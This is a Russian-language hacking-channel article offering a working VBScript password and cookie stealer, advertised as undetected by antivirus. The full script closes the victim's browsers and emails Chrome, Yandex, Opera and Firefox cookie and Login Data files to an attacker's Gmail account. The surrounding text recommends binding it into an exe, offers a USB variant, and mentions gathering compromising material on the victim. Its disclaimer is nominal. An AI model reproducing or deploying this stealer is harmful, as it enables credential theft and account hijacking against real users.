Стиллер паролей из браузеров на vbs (FUD 0/59)
https://t.me/joinchat/AAAAAEP9AImqul_PXxDCAAНаш канал https://t.me/joinchat/AAAAAEP9AImqul_PXxDCAA
Статья by @GalaxyDragon для https://t.me/cyber_communism и CyberLife
Что бы бесплатно сделать объявление о работе и товарах и стать нашим проверенным ТСом (продажа ваших товаров. объявление о наборе воркеров) пишите в @mind_xakep
Дисклеймер:
Данная статья не призывает к действиям и представлена лишь для ознакомления.
Почему же vbs, а не любое существующее решение? Да потому что он даже без криптования не палится ничем (0/59 virus total), и запустится на любой windows системе.
Данная программа достанет нам Cookies из Google Chrome, Yandex Browser, Opera и Firefox, а так же пароли из Хрома и Яндекса (система легко апдейтится для любых хром-подобных браузеров. Так же мы можем достать файл истории из браузеров, что может нам помочь в получении компромата или изучении поведения жертвы. Ну и всё добытое отправит нам на почту. Если есть нужда можете написать в лс @GalaxyDragon, отправлю версию которая будет копировать файлы в текущую папку (для запуска с флешки).
P.S. да, я покривил душой говоря что крадутся пароли. Из файла Login Data действительно достаются пароли программой chromepass. Куки тоже могут дать вам доступ к сайту от лица жертвы.
Для использования вам нужна какая-нибудь почта gmail. Для склейки можете перевести его в exe с помощью этой проги.
Внимание: после первого запуска (закройте все браузеры) программа вылетит, а в почте на которую вы присылаете появится письмо с предложением разрешить использование почты из небезопасных приложений. Подтвердите его.
Попробуем объяснить некоторые места:
Просто объявление глобальный переменных. идём дальше.
Const schema = "http://schemas.microsoft.com/cdo/configuration/"
Const cdoBasic = 1
Const cdoSendUsingPort = 2
Dim oMsg, oConf
Set wshShell = CreateObject( "WScript.Shell" )
strUserName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )
On Error Resume Next
Set oMsg = CreateObject("CDO.Message")
oMsg.From = "yourgmail@gmail.com" ' имя вашего ящика
oMsg.To = "yourgmail@gmail.com" 'кому. пишите вас же
oMsg.Subject = "Test from VBScript"
oMsg.TextBody = "If you can read this, the script worked!"
Set WshShell = CreateObject("WScript.Shell")
Set oExec = WshShell.Exec("taskkill /fi ""imagename eq opera.exe""")'завершение оперы, иначе нет доступа к крадущимся фалам.
Set oExec = WshShell.Exec("taskkill /fi ""imagename eq firefox.exe""")'огнелиса
Set oExec = WshShell.Exec("taskkill /fi ""imagename eq chrome.exe""")'хрома
Set oExec = WshShell.Exec("taskkill /fi ""imagename eq browser.exe""")' яндекс браузера
WScript.Sleep 4000' пауза чтобы браузеры успели закрыться и был доступ. нельзя чтобы юзер снова открыл браузер
Set FSO = CreateObject("Scripting.FileSystemObject")
If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Local\Google\Chrome\User Data\Default\Cookies")) Then
oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Google\Chrome\User Data\Default\Cookies"
oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Google\Chrome\User Data\Default\Login Data"
Else
End if
Проверям существование браузера на данном пк, и если есть то отправляем к себе куки.
If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Roaming\Opera Software\Opera Stable\Cookies")) Then
oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\Opera Software\Opera Stable\Cookies"
Else
End if
If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\cookies.sqlite")) Then
oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\cookies.sqlite"
Else
End if
If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies")) Then
oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies"
oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data"
Else
End if
' GMail SMTP server configuration and authentication info
Set oConf = oMsg.Configuration
oConf.Fields(schema & "smtpserver") = "smtp.gmail.com" '
oConf.Fields(schema & "smtpserverport") = 465 'port number
oConf.Fields(schema & "sendusing") = cdoSendUsingPort
oConf.Fields(schema & "smtpauthenticate") = cdoBasic 'authentication type
oConf.Fields(schema & "smtpusessl") = True 'use SSL encryption
oConf.Fields(schema & "sendusername") = "yourgmail@gmail.com" 'ящик для отсылки
oConf.Fields(schema & "sendpassword") = "password" 'пороль от этого ящика
oConf.Fields.Update()
' send message
oMsg.Send()
If Err Then
resultMessage = "ERROR " & Err.Number & ": " & Err.Description
Err.Clear()
Else
resultMessage = "Message sent ok"' 'Удалить после дебага
End If
Wscript.echo(resultMessage)' Удалить после дебага
то что придёт выглядит как то так
Вообщем-то всё. Надеюсь было полезно, и вы заинтересуетесь vbs.